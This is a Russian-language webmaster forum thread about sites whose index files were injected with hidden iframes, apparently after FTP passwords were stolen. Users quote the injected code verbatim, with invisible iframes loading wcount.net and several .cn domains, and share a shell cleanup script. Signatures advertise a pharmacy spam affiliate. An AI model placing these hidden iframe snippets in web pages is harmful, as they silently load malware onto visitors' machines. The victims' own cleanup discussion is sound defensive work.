|
На страницу 1, 2, 3 След. |
|
|
![]()
IseeDeadPeople
Объединенная Электрическая |
Зарегистрирован: 06.12.2005
Сообщений: 21692
|
Обратиться по нику
|
| IseeDeadPeople |
Ответить с цитатой | | |
|
Я сегодня на одном своем сайте.. в индекс стр. внизу ифрейм на трои-поников обнаружил.
это моя машинка заражена ?
.. или хостинг был взломан ? (речь не о SG.. о других)
если моя:
это трои на лету, при закачке файлов на ФТП, вставляют в конец свой фрей?
.. они все ФТП менеджеры умеют игогокать - перехватывать?
.. или тама сначало крадуться ФТП логины/пароли . а потом уже.. со стронней машинке заливаеться ?
если не моя (сервер): что делать сразу ? - если на файлы поставить атрибуты только чтения - поможет ?
.. где бы почитать про эти вирусы.. их празнаки.. |
|
|
|
|
|
porno |
![]()
IseeDeadPeople
Объединенная Электрическая |
Зарегистрирован: 06.12.2005
Сообщений: 21692
|
Обратиться по нику
|
| IseeDeadPeople |
Ответить с цитатой | | |
|
кажеться не меня, а хост ломанули..
код добавляеться такой
| Код: |
|
<div style="display:none"><iframe src="http://wcount.net/com/index.php" width="320" height="240"></iframe></div>
|
|
|
|
|
|
|
porno |
![]()
Grab + +
Опытный |
Зарегистрирован: 19.11.2007
Сообщений: 126
|
Обратиться по нику
|
| Grab + + |
Ответить с цитатой | | |
|
а прикинь у меня все сайты в этом гавне в index.*
нужон скрипт типа поиска и замены, вручную нереально
да и еще записан тупо ?<html><body><iframe>шлак всевозможный</iframe></body></html>> php ессно в дауне |
|
|
|
|
|
|
![]()
IseeDeadPeople
Объединенная Электрическая |
Зарегистрирован: 06.12.2005
Сообщений: 21692
|
Обратиться по нику
|
| IseeDeadPeople |
Ответить с цитатой | | |
|
так ты незнаешь как оно меняет ?
сначало ворует ФТП инфо.. или на лету ?
или это вирь серверы поражает ?
+ надо как бы быстрее сделать..
так как гугль заметит и бан наверно будет..
работа 6 мес под хвост   |
|
|
|
|
|
porno |
![]()
Grab + +
Опытный |
Зарегистрирован: 19.11.2007
Сообщений: 126
|
Обратиться по нику
|
| Grab + + |
Ответить с цитатой | | |
|
я незнаю как так вышло, у меня cuteftp, сайты на разных хостах висят и везде одно и тоже, вывод увели пароли, баня да, некоторые уже в бане, если файлов немного можно и руками почистить что я и делаю каждый день на самых крупных чтоб морда работала, на остальные пока забил
ссылки есть по теме , но все не то
| Код: |
http://gogolev.net/node/94
http://ihtiandr.info/web/3-web/79-how-to-remove-virus-from-site-scripts.html
http://www.opennet.ru/openforum/vsluhforumID9/6776.html
http://rizl.ru/kb/entry/5/
|
|
|
|
|
|
|
|
![]()
creator123
Гуру |
Зарегистрирован: 25.07.2007
Сообщений: 1145
|
Обратиться по нику
|
|
|
<----- если понравился пост, жмакай сюды <----- |
![]()
aekros
Опытный |
Зарегистрирован: 21.09.2008
Сообщений: 214
|
Обратиться по нику
|
| aekros |
Ответить с цитатой | | |
|
| Может троян на компе(что-то типа клавиатурного шпиона, или как там сейчас)? |
|
|
|
|
|
|
![]()
IseeDeadPeople
Объединенная Электрическая |
Зарегистрирован: 06.12.2005
Сообщений: 21692
|
Обратиться по нику
|
| IseeDeadPeople |
Ответить с цитатой | | |
|
я незнаю как так вышло, у меня cuteftp, сайты на разных хостах висят и везде одно и тоже, вывод увели пароли, баня да, некоторые уже в бане, если файлов немного можно и руками почистить
он значит автоматом на фтп конектиться и меняет..
он только индекс файлы правит или еще какие ?
что нить кроме ФТП паролей тырит ?
-- кстати, я пока никаких бань несхватил - вовремя все.. и вродеб на 75% вычистил |
|
|
|
|
|
porno |
![]()
adamant
V.I.P. |
Зарегистрирован: 20.03.2008
Сообщений: 11494
|
Обратиться по нику
|
| adamant |
Ответить с цитатой | | |
|
| скорее всего шелл.. хостинги то чьи? можна в личку что б не было антирекламы. |
|
|
|
|
|
EvaPharmacy. Чтобы мазать хлеб икоркой, Ева – лучшая партнёрка! Инвайты Jabber: evasupport@jabber.org и ICQ: 750000
Unlimited on 1Gbs port | |
![]()
IseeDeadPeople
Объединенная Электрическая |
Зарегистрирован: 06.12.2005
Сообщений: 21692
|
Обратиться по нику
|
| IseeDeadPeople |
Ответить с цитатой | | |
|
скорее всего шелл.. хостинги то чьи? можна в личку что б не было антирекламы.
непонял.. протроянен моя машина была.. или это что то новое на линуксы действует ? |
|
|
|
|
|
porno |
![]()
Grab + +
Опытный |
Зарегистрирован: 19.11.2007
Сообщений: 126
|
Обратиться по нику
|
| Grab + + |
Ответить с цитатой | | |
|
| хостинги разные, шел я искал на мелких сайтах, НЕТУ там ничего лишнего, но пример наглядный, вчера сменил ftp пасс на одном хосте и сегодня все появилось по новой, у меня изменяет только index.*, кроме фтп не заметил чтоб что-то еще ушло, оно у меня в робоформе все, сегодня еще заметил что если выставить атрибуты на 444 вроде все нормально, однако пароли фтп все равно уходят как-то, пора vmware запускать и из под него ходить |
|
|
|
|
|
|
![]()
adamant
V.I.P. |
Зарегистрирован: 20.03.2008
Сообщений: 11494
|
Обратиться по нику
|
|
|
EvaPharmacy. Чтобы мазать хлеб икоркой, Ева – лучшая партнёрка! Инвайты Jabber: evasupport@jabber.org и ICQ: 750000
Unlimited on 1Gbs port | |
![]()
Grab + +
Опытный |
Зарегистрирован: 19.11.2007
Сообщений: 126
|
Обратиться по нику
|
| Grab + + |
Ответить с цитатой | | |
|
на всех, код такой
| Код: |
<html><body><iframe src="http://filmlifemusicsite.cn/in.cgi?cocacola95" width=1 height=1 style="visibility: hidden"></iframe><iframe src="http://promixgroup.cn/in.cgi?cocacola91" width=1 height=1 style="visibility: hidden"></iframe><iframe src="http://betstarwager.cn/in.cgi?cocacola86" width=1 height=1 style="visibility: hidden"></iframe></body></html>
|
|
|
|
|
|
|
|
![]()
adamant
V.I.P. |
Зарегистрирован: 20.03.2008
Сообщений: 11494
|
Обратиться по нику
|
| adamant |
Ответить с цитатой | | |
|
sh скриптик, чисттит все файлы с инфреймом (инфрейм меняем на свой)
| Код: |
#!/bin/sh
find . -print0 | xargs -0 grep -l 517891 > vir-list.txt
while read line
do
sed 's/:<iframe frameborder=0 border=0 height=1 width=1 src="http:\/\/517891.cn\/in.cgi?8"//g' <$line >tmp
mv tmp $line
done < vir-list.txt
|
кому почитать → "gogolev.net/node/94" |
|
|
|
|
|
EvaPharmacy. Чтобы мазать хлеб икоркой, Ева – лучшая партнёрка! Инвайты Jabber: evasupport@jabber.org и ICQ: 750000
Unlimited on 1Gbs port | |
![]()
Grab + +
Опытный |
Зарегистрирован: 19.11.2007
Сообщений: 126
|
Обратиться по нику
|
|
|
|
|
|
